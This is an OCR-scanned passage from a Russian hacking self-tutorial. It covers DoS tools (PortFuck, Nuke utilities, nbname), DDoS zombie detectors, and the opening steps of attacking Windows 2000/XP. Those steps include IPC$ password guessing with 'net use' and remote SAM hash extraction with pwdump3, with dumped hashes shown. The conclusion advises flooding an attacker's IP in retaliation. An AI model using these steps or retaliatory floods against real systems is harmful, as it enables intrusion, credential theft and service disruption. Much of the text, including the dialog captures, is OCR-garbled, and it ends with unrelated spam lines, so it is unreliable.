http://www.bindview.com), которая, к тому же, представляет собой единственную реализацию атаки DDoS на платформе Win32. В 2000 году атаками DDoS
были поражены многие серверы Интернета, включая Web-сайты самых известных фирм (этим, наверное, объясняется отсутствие на сайтах хоть скольконибудь работоспособной версии программ, реализующих атаку WinTrinoo).
Для исследования и выявления компьютеров-зомби компания Foundstone предложила программные средства, про которые мы еще поговорим в конце главы,
где обсуждаются меры защиты от атак DoS.

Атаки на истощение ресурсов
Атака DoS, направленная на истощение ресурсов, имеет своей целью захват системных ресурсов атакованного хоста, таких как память, процессор, квоты дискового пространства. Как правило, хакер, предпринимающий данную атаку DoS,
уже имеет доступ к общим ресурсам системы и своими действиями пытается
захватить дополнительные ресурсы, чтобы затруднить доступ к ним других
пользователей. Эти действия могут привести к недоступности сервера для подключений остальных пользователей, зависанию процессов и переполнению дискового пространства.
Одна из наиболее интересных и эффективных атак DoS рассматриваемого типа
реализуется программой PortFuck, которая выполняет атаку переполнением таблицы процессов (еще ее называют флудером TCP-соединений по причинам, которые изложены далее). Утилита PortFuck открывает с хостом-жертвой все новые и новые TCP-соединения до тех пор, пока не переполнит ресурсы атакованного компьютера. Этот момент наступит независимо от мощности процессора,
размера памяти, полосы пропускания линии связи и любых других факторов по
той простой причине, что каждое TCP-соединение требует для открытия ресурсы,
а они, в любом случае, не беспредельны.
На Рис. 9.5 представлен главный диалог утилиты PortFuck.
!.f: PortFuck 1.0Ь2 PRIVATE BUILD
Host: localhost

НШЮ|

]

START

|

Help?

Port:

П Reconnect on Disconnect
Delay (MS): |1 000
[Ready.

|

NICI

PA

Socks: [5

|

Puc. 9.5. Программа PortFuck готова сокрушить свою жертву
149

Самоучитель хакера

Атаки Nuke
Слово «Nuke» на английском языке означает «ядерное оружие», и если такое
название присвоили атакам DoS, то, очевидно, они чего-то, стоят. На русском
эти атаки так и называют — «нюк», и суть классического «нюка» состоит в следующем. В сетях TCP/IP для проверки функционирования хостов применяется
протокол ICMP, про который мы упоминали в разделе «Флудер ICMP» выше.
При возникновении в сети какой-либо ошибки функционирования — обрыва
соединения, недоступности линии связи и т.п. — происходит генерация сообщения ICMP, вслед за которым выполняются определенные действия, например,
перестройка маршрутизации сети исключением линии связи из таблицы маршрутизации. Одновременно разрываются все подключения с компьютером,
ставшим недоступным.
На этом-то и строится расчет хакера — послав компьютеру А, подключенному к
компьютеру В, сообщение, что компьютер В якобы недоступен, можно прервать
соединение. Наибольший эффект такие «шалости» имеют при атаках на ШС и
Web-чаты, поскольку их посетители подолгу остаются подключенными к серверу, и их легко вычислить и «отсоединить» от сервера. Так что атаки Nuke — это
сущее наказание для сетей ШС.
При работе с атаками DoS типа Nuke и хакерам, и антихакерам следует учесть,
что системы Windows 2000/XP не позволяют вытворять с собой такие штучки,
которые без проблем выводят из строя системы Windows 9x. Это подтверждают
как эксперименты по применению «нюков» к компьютерам Windows 2000/XP,
так и литературные источники (например, [4]). Тем не менее, учитывая наличие
в Интернете множества компьютеров Windows 9x, да еще и лишенных всякой
защиты брандмауэрами, не стоит сбрасывать со счетов возможности «нюков».
Для антихакеров «нюки» подчас могут стать той дубиной, которая спасет их
при путешествиях по виртуальным просторам Интернета от персонажей типа
доктора Добрянского.
Существует великое множество утилит для выполнения атак Nuke — все на одно лицо, с очень похожими диалогами. Рабочее окно одной из них, программы
Windows Nuke’eM version 1.1, представлено на Рис. 9.8.
Чтобы выполнить атаку Nuke на компьютеры нашей экспериментальной локальной сети, добавим к ней еще одного клиента — Alex-2, с IP-адресом 1.0.0.4 и
работающего под управлением системы Windows 95. Далее выполним такие шаги.
>• В поле Address (Адрес) рабочего окна программы Windows Nuke’eM version 1.1,
представленном на Рис. 9.8, последовательно введите IP-адреса компьютеров
Alex-2 (Windows 95), Alex-3 (Windows XP) и Alex-1 (Windows 2000). По мере
ввода ГР-адресов щелчком на кнопке Add (Добавить) вносите их в список в
левой части диалога.
152

Атаки DoS

\»\ Eort [щ

Address [1.0,0,7
1.0.0.4
1.0.0.5
1.0.0.7

lext [Testing 1 2 3
JDelay

ft

[-^ П dose after execulio

This program is created by Sadikuz (c) for
test-purposes only. The author of this
program
is not responsible for any misbehaviour by
|

Add

| |Remove! |

Help

I

Execute
Dong

Puc. 9.8. Рабочее окно классического «Нюка» весьма незамысловато
>

Щелкните на кнопке Execute (Исполнить). В окне Windows Nuke’eM version 1.1
отобразится информация о ходе атаки (Рис. 9.9).

НИЖЗэЕ

Windows Nuke’eM — Version 1 . 1
Rle

Help

Address |1. 0.0.7

MEot|l39

1.0.0.4 {Nuked}
1.0.0.5 {Connect error}
1.0.0.7 {Connect error}

К]

lexl |Testing 1 2 3
Delay |o

I

|
^ Q Close after execution

This program is created by Sadikuz (c) for
test-purposes only. The author of this
program
is not responsible for any misbehaviour by
|

Add

| | Remove | |

|

Help

| 1
Execute

I

I

Unable to connect to: 1 .0.0.7

Puc. 9.9. На компьютере Alex-2 следует ожидать неприятностей!
> Чтобы проверить результаты применения «нюка» к компьютеру Alex-2, попробуем обратиться к компьютеру А1ех-2 с помощью проводника Windows.
В ответ проводник Windows отображает диалог, представленный на Рис. 9.10.
Таким образом, связь с компьютером А1ех-2 нарушена — что и требовалось достичь атакой Nuke. Теперь вы понимаете, почему при общении в чатах и всякого
рода IRC-сообществах следует избегать идентификации вашего IP-адреса. Ведь
при работе на компьютерах со старыми системами Windows вы практически ничем не защищены от «нкжов», если, конечно, не используете толковый брандмауэр или систему IDS (рекомендуем BlacklCE Defender).

153

Самоучитель хакера
• Замедление скорости передачи данных — посылая якобы от имени промежуточного маршрутизатора ICMP-сообщение Source Quench (Замедлить источник), хакер принуждает хост снизить скорость передачи данных. Этого же результата можно достичь, посылая ICMP-сообщение Destination Unreachable:
Datagram Too Big (Цель недоступна: датаграмма слишком велика).
Как видим, возможности протокола ICMP для создания атак DoS просто неисчерпаемы, однако следует учесть, что владея такой техникой, хакер может получить гораздо больше пользы, если применит ее для достижения других, более
плодотворных целей, чем для причинения мелких и средних гадостей своим
сетевым соседям.
Напоследок укажем самую, пожалуй, популярную атаку DoS, реализованную в
сетях TCP/IP — атаку на протокол NetBIOS от хакера Sir Dystic, создавшего утилиту nbname, которая искажает работу службы NBNS преобразования IP-адресов в
имена NetBIOS в сетях Windows 2000 [4]. Запустив утилиту nbname, можно полностью нарушить работу всей сети, передавая сообщения NetBIOS об освобождении или регистрации имен NetBIOS. После этого работа сети TCP/IP полностью или частично нарушается — общие ресурсы становятся недоступными, подключения и просмотр сетевых соседей затрудняется, и перестают работать некоторые команды тестирования сети, например, net send.
К сожалению, все попытки обнаружить в Интернете утилиту nbname оказались
тщетными — сайты, указанные ссылками на страницах с описанием атаки утилитой nbname, тщательно заглушены, что наводит на мысль об исключительной
эффективности nbname.

Зашита от атак
Атаки DoS — это бедствие нынешнего виртуального мира, приводящие в хаос
мощные вычислительные системы. Борьба с ними усложняется еще и тем, что
все эти атаки подчас невозможно отразить иначе, кроме как закрытием всех сетевых соединений атакованного хоста, что очень часто неприемлемо по финансовым соображениям. Тем не менее, в [11] отмечается, что иногда выгоднее увеличить мощности компьютерной системы, подверженной атакам DoS, чем закрыть к ней доступ, скажем, остановить работу Web-сервера организации.
Расчет здесь строится на истощение ресурсов атакующей стороны, которой просто не удастся превзойти ресурсы Web-сервера. Другое важное средство защиты — переход на современные операционные системы и программное обеспечение, которое «осведомлено» о последних изобретениях по части атак DoS.
Однако все это может не устоять перед атакой DDoS — хакер, овладевший такими средствами, может стать воистину всемогущим, поскольку нет такого сервера, который мог бы устоять перед атакой, идущей со всех сторон земного шара с

156

Атаки DoS
неопределенно большого числа комьютеров-зомби. Такие атаки требуют особого подхода, и вот что предлагает компания Foundstone.
Вместо настройки системы защиты сервера, усиления ресурсов подверженного
атакам компьютера, т.е. всего того, что в Главе 1 мы назвали «пассивная оборона», специалисты Foundstone предлагают меры активной обороны. В ответ на
атаку DDoS, использующей сотни и тысячи «зомби», Foundstone предлагает самому перейти в наступление и заглушить работу «зомби» встречной атакой.
Для выполнения такой контратаки сотрудник фирмы Foundstone, неутомимый
Робин Кейр (Robin Keir), разработал и предоставил всем желающим возможность
загрузить на сайте http://www.foundstone.com бесплатную утилиту DDoSPing 2.0,
которая выполняет тестирование компьютера на предмет наличия в нем программы-зомби. Далее работу выявленного зомби можно заглушить, воспользовавшись
программой флудера UDP, описанного в разделе «Флудер UDP» выше.
На Рис. 9.11 представлен диалог программы DDosPing 2.0, содержащий все необходимые элементы для выполнения тестирования.
-Target IP address range Start IP address

|1.Q.Q.5|

End IP address

h.OO 5

Slop

-Transmission speed control-

-o-

Speed (pkts/sec)
I 181

I

Modem—>-Cable—>—T1 —>—LAN
-Infected Hosts-

Program started: Sun Febl613:50:48 2003
Waiting 6 seconds for final results…
Program stopped: Sun Feb1613:50:54 2003

— Status Current IP
Packets sent
Time elapsed
Zombies detected
ne /лс,

1.0.0.5

3
00:00:00
0

Save List
Configuration

Affp://i

Рис. 9.11. Диалог программы выявления зомби DDoS
позволяет тестировать целую сеть
Для работы с программой DDoSPing 2.0 следует выполнить такие шаги.
> В поля Start IP address (Начальный IP-адрес) и End IP-address (Конечный
ГР-адрес) введите начальный и конечный IP-адреса тестируемой сети или отдельного хоста.
157

Самоучитель хакера
>• Установите ползунок Speed (Скорость) в позицию, соответствующую тестируемой сети, в данном случае LAN.
>• Если необходимо, щелкните на кнопке Configuration (Конфигурация) и откройте диалог настройки программы Рис. 9.12).

В Enable

|

Send to UDP port

[34555

«Ping» command

|pngQ..KsH4

Expected reply

(PONG

Windows defaults
|

UNIX defaults

Listen on UDP port |355Б5

|

I
i

0 Enable
SendlCMPID

[668

«Ping» commend

Jgesundheit!

|

Expected reply

|sicken\n

P^ceivelCMPID [б69

|

I
I

0 Enable
SendlCMPID
«Ping» command

[?89

|

Receive ICMP ID [Ш

i

|

I

— ~ •»»»»
П Show UDP transmit errors
Max run duration (sees)

[O

Transmit each packet

1

After scon ends, wait

Cancel

I (Q«forev@r)
times

| OK

sees for final rep lies

Рис. 9.12. Настройка программы тестирования
> В зависимости от тестируемой системы, щелкните на кнопке Windows defaults
(Windows по умолчанию) или Unix defaults (Unix по умолчанию), чтобы установить стандартные параметры проверки систем Windows или Unix, соответственно.
>• Обратите внимание, что программа DDoSPing 2.0 позволяет выявлять зомби, принимающие участие не только в атаках WinTrinoo, но и других, не
менее интересных атаках того же рода — StachelDraht и Tribe Flood Network. Если настройки программы вас устраивают, щелкните на кнопке ОК
в диалоге настройки программы (Рис. 9.12).
> В диалоге DDoSPing 2.0 на Рис. 9.11 щелкните на кнопке Start (Пуск) и выполните тестирование. Ход проверки отображается в поле Infected Hosts (Зараженные хосты).
Другой, не менее популярной утилитой для выявления компьютеров-зомби
является программа Zombie Zapper (http://razor.bindview.com/tools/
ZombieZapper__form.shtml), которая как раз и является творцом атаки WinTrinoo.
На Рис. 9.13 представлен диалог этой программы, который, как видим, не очень
отличается от DDoSPing 2.O.
158

Атаки DoS

Target(s)

0 Specify single IP or class С subnet

—|

Target IP:
| input IMs…

0 Trinoo

UDP source

|53

0 Trinoo for Windows
0TFN
0 Sta.chelDroht
QShatt-myfloodedhost:

|

[ T o I Repeats (1-300)

Zap

Exit

Puc. 9.13. Программа Zombie Zapper также неплоха
Однако в отличие от DDoSPing 2.0, программа Zombie Zapper не позволяет выполнять настройку тестирования хостов и не снабжена такими удобными средствами наблюдения за ходом проверки, как DDoSPing 2.O.

Заключение
Как вы, наверное, уже поняли, атаки DoS — это занятие не для Хакеров с большой буквы, а скорее для типов, наподобие упомянутого в Главе 1 доктора Добрянского. В самом деле, что толку оттого, что где-то за океаном, за тридевять
земель, у кого-то перестанет работать Web-сервер и этот кто-то понесет потери.
Вам-то что с того, если только, надеюсь, вы не кибертеррорист и не личность с
«обугленным черепом и клочками растительности, и обрывками проводов», как
у доктора Добрянского. Но вот для Антихакера атаки DoS иногда могут стать
просто спасением, если попытки остановить атаки какого-нибудь «кул хацкЁра»
(да-да, именно «Ё», уже и такие появились) не получаются никаким образом и нет
уже сил и средств на непрерывное наращивание мощностей Web-сервера. Выявите
IP-адрес такого «хацкЁра» и затопите его компьютер пакетами ICMP-флудера!
Системы EDS всегда готовы предоставить DP-адрес, требуемый для такой контратаки, а простые флудеры, подобные описанным в этой главе, можно найти на
многих сайтах Web. Однако помните, что такие методы защиты — на грани допустимого, и их использование чревато. Поэтому антихакер должен применять
обоюдоострое оружие атак DoS весьма умело, действуя через прокси-сервер и
прикрываясь брандмауэром — а то ведь и ответить могут!
159

Г Л А В А 10.

Хэкииг компьютеров Windows ZOOO/Xf
Итак, хакеру удалось подсоединиться к локальной сети, воспользовавшись каким-то заброшенным (чужим) компьютером, или нелегально подсоединиться к
сетевому кабелю, проходящему где-то в подвале, применив специальное устройство (подробнее о таких приспособлениях вы можете прочитать, например, в [1]).
Впрочем, все это, как правило, излишне — при царящем в нынешних локальных
сетях хаосе достаточно получить доступ к обычному сетевому компьютеру — и
далее все зависит от вас. Итак, хакер получил доступ к локальной сети и теперь
хочет получить доступ к информационным ресурсам сетевых хостов. Как же он
может это сделать?
Далее работа утилит хакинга иллюстрируется на примере нашей
экспериментальной сети TCP/IP, которую мы использовали на протяжении всей книги. Эта сеть позволит продемонстрировать набор технических приемов хакинга сетей TCP/IP без нарушения чьихлибо прав на конфиденциальность информации. Автор категорически настаивает на неприменении описанных далее средств к реальным сетям и предупреждает о возможной ответственности.
В Главе 1 мы описали все этапы хакерского нападения и указывали, что хакер
вначале попытается узнать все что только можно об организации атакуемой сети
и применяемых в ней сетевых технологиях. В этой главе мы опустим этап предварительного сбора данных — он достаточно подробно описан, например, в [11].
Вместо этого мы поподробнее рассмотрим все последующие этапы сетевой атаки, которые, собственно, и делают хакинг таким «интересным» занятием. Как
указывалось в Главе 1, первое, что должен сделать хакер для проникновения в
сеть — это выполнить ее сканирование и инвентаризацию.

Сканирование cemu*TCf/lf
Сканирование преследует цель определение IP-адресов хостов атакуемой сети, и
для выполнения сканирования можно воспользоваться утилитой ping из набора
средств, представленных в пакете W2RK (Windows 2000 Resource Pack).
Эта утилита посылает сетевым хостам с ГР-адресами в заданном диапазоне пакеты протокола ICMP (Internet Control Message Protocol — Протокол управляющих
сообщений в сети Интернет). Если в ответ на посланный пакет приходит ответ значит по соответствующему адресу находится сетевой хост. На Рис. 10.1 представлен результат сканирования утилитой ping хоста Sword-2000.

Хакинг компьютеров Windows 2000/XP
с \ Command Prompt

Pinging 1.Q.O.I with 32 bytes of data:
Reply
Reply
Reply
Reply

fron
fron
fron
fron

1.0.0.1:
1.0.0.1:
1.0.0.1:
1.0.0.1:

bytes=32
bytes=32
bytes=32
bytes=32

tinenbtst

Sviord:
Node Ipflddress: 11.Ш.0.5] Scope Id: I I
NetBIOS Remote Machine Nane Table

SUORD-20QQ
SUORD-2Q00
SUORD
SUORD
SUORD
SUORD
SWORD-20QGI
SUORD
MSBROUSE_
INef»Seruices
IS-SUORD-2000.
flDMINISlllfllOR

Registered
Registered
Registered
Registered
Registered
Registered
Registere
Registerei
Registered
Registered
52-54-flB-14-S5-B4

Puc. 10.4. Общие ресурсы компьютера Sword-2000
Как видим, учетная запись пользователя Administrator открывает общий сетевой
доступ к некоторым папкам файловой системе компьютера Sword-2000 и дисководу CD-ROM. Таким образом, мы уже знаем о компьютере достаточно много — он
разрешает нулевые сеансы NetBIOS, на нем работает пользователь Administrator,
открыты порты 7, 9, 13, 17, 139, 443, 1025, 1027 компьютера, и в число общесетевых ресурсов входят отдельные папки локального диска С:. Теперь осталось
только узнать пароль доступа пользователя Administrator — и в нашем распоряжении будет вся информация на жестком диске С: компьютера. Чуть ниже мы

164

Хакинг компьютеров Windows 2000/XP
покажем, как для этого используется утилита pwdump3.exe удаленного извлечения паролей из системного реестра Windows NT/2000/XP и программа LC4 их
дешифрования.
А что можно сделать, если протокол NetBIOS через TCP/IP будет отключен
(компьютеры Windows 2000/XP предоставляют такую возможность)? Существуют и другие средства инвентаризации, например, протокол SNMP (Simple
Network Management Protocol — Простой протокол сетевого управления), обеспечивающий мониторинг сетей Windows NT/2000/XP. Атаки, основанные на уязвимостях SNMP, описаны, например, в [11].
А сейчас, после того, как мы собрали сведения об атакуемой системе, перейдем
к ее взлому.

Реализация цели
Исполнение атаки на системы Windows NT/2000/XP состоит из следующих этапов.
• Проникновение в систему, заключающееся в получении доступа.
• Расширение прав доступа, состоящее во взломе паролей учетных записей с
большими правами, например, администратора системы.
• Выполнение цели атаки — извлечение данных, разрушение информации и т.д.

Проникновение Ъ систему
Проникновение в систему начинается с использования учетной записи, выявленной на предыдущем этапе инвентаризации. Для определения нужной учетной записи хакер мог воспользоваться командой nbtstat или браузером MIB,
или какими-либо хакерскими утилитами, в изобилии представленными в Интернете (см. целый перечень в [3] или в [4]). Выявив учетную запись, хакер может
попробовать подсоединится к атакуемому компьютеру, используя ее для входной аутентификации. Он может сделать это из командной строки, введя такую
команду.
D:\>net use \\1.0.0.1\1РС$ * /u:Administrator
Символ «*» в строке команды указывает, что для подключения к удаленному
ресурсу IPC$ нужно ввести пароль для учетной записи Administrator. В ответ на
ввод команды отобразится сообщение:
Type password for \\1.0.0.1\IPC$:
Ввод корректного пароля приводит к установлению авторизованного подключения. Таким образом, мы получаем инструмент для подбора паролей входа в
компьютер — генерируя случайные комбинации символов или перебирая содер165

Самоучитель хакера
жимое словарей, можно, в конце концов, натолкнуться на нужное сочетание
символов пароля. Для упрощения подбора существуют утилиты, которые автоматически делают все эти операции, например, SMBGrind, входящая в коммерческий пакет CyberCop Scanner компании Network Associates. Еще один метод создание пакетного файла с циклическим перебором паролей (пример такого
файла можно найти в [3]).
Однако удаленный подбор паролей — далеко не самое мощное орудие взлома.
Все современные серверы, как правило, снабжены защитой от многократных попыток входа со сменой пароля, интерпретируя их как атаку на сервер. Для взлома
системы защиты Windows NT/2000/XP чаще используется более мощное средство, состоящее в извлечении паролей базы данных SAM (Security Account Manager — Диспетчер учетных данных системы защиты). База данных SAM содержит
шифрованные (или, как говорят, хешированные) коды паролей учетных записей,
и они могут быть извлечены, в том числе удаленно, с помощью специальных
утилит. Далее эти пароли дешифруются с помощью утилиты дешифрования,
использующей какой-либо метод взлома, например, «грубой силой», либо словарной атакой, путем перебора слов из словаря.
Наиболее известной утилитой дешифрования, применяемой для взлома паролей
SAM, является программа LC4 (сокращение от названия LOphtcrack, новейшая
версия — LC4) (http://www.atstake.com/research/redirect.html), которая действует в паре с такими утилитами.
• Samdump — извлечение хешированных паролей из базы данных SAM.
• Pwdump — извлечение хешированных паролей из системного реестра компьютера, включая удаленные системы. Эта утилита не поддерживает усиленное шифрование Syskey базы SAM (подробнее о Syskey см. Главу 2).
• Pwdump2 — извлечение хешированных паролей из системного реестра, в котором применено шифрование Syskey. Эта утилита поддерживает работу
только с локальными системами.
• Pwdump3 — то же, что и Pwdump2, но с поддержкой удаленных систем.
Что такое шифрование Syskey, мы подробно обсудили в Главе 2; здесь укажем,
что это средство усиленного шифрования базы SAM, которое устанавливается в
системах Windows 2000/XP по умолчанию, а для систем Windows NT должно
быть установлено как дополнительная возможность.
В Главе 2 было описано, как следует извлекать пароли из локального системного реестра, сейчас же рассмотрим, как эта операция выполняется удаленно.
Для извлечения хешированных паролей из компьютера Sword-2000 применим
утилиту PwdimpS, запустив ее из командной строки:
C:\>pwdump3 sword-2000 > password.psw

166

Хакинг компьютеров Windows 2000/XP
Здесь в командной строке указан целевой компьютер Sword-2000, а далее задано
перенаправление вывода извлеченных данных в файл с именем password.psw.
Содержимое полученного в результате файла представлено в окне приложения
Блокнот (Notepad) (Рис. 10.5).
sword.psw — Notepad
File

Edit

Format

Help

\dministator: SOO:7A01665EB2£B6C14AAD3B435B51404EE:OB0412D8761239A73143EFAE928E9FO
A:::
Guest:501 :NO PASSWORD*»‘
:NO PASSWORD
*
:::
krbtgt:S02:NO PASSWORD

:7BD70B6AF1C3909E006426SFE207B256:::
Alex:1110:7A01665EB2EB6C14MD3B43SB51404EE:OB0412D8761239A73143EFAE92eE9FOA;::
Alex-1:1113:7A01665EB2EB6C1•?•

SSI
os-

о 6

S 3

i!
t.

E-mail: opt@triumph.ru

Понравилась статья? Поделить с друзьями:
  • Ботокс в холодной технике для волос инструкция
  • Снотворное мелаксен цена инструкция по применению взрослым
  • Рекаспар 200 мл инструкция по применению
  • Массажная ванночка для ног бош инструкция по эксплуатации
  • Капли назальные изофра инструкция по применению взрослым